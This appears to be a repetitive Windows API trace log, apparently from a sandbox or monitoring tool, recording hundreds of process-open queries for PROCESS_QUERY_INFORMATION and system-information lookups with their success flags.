Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
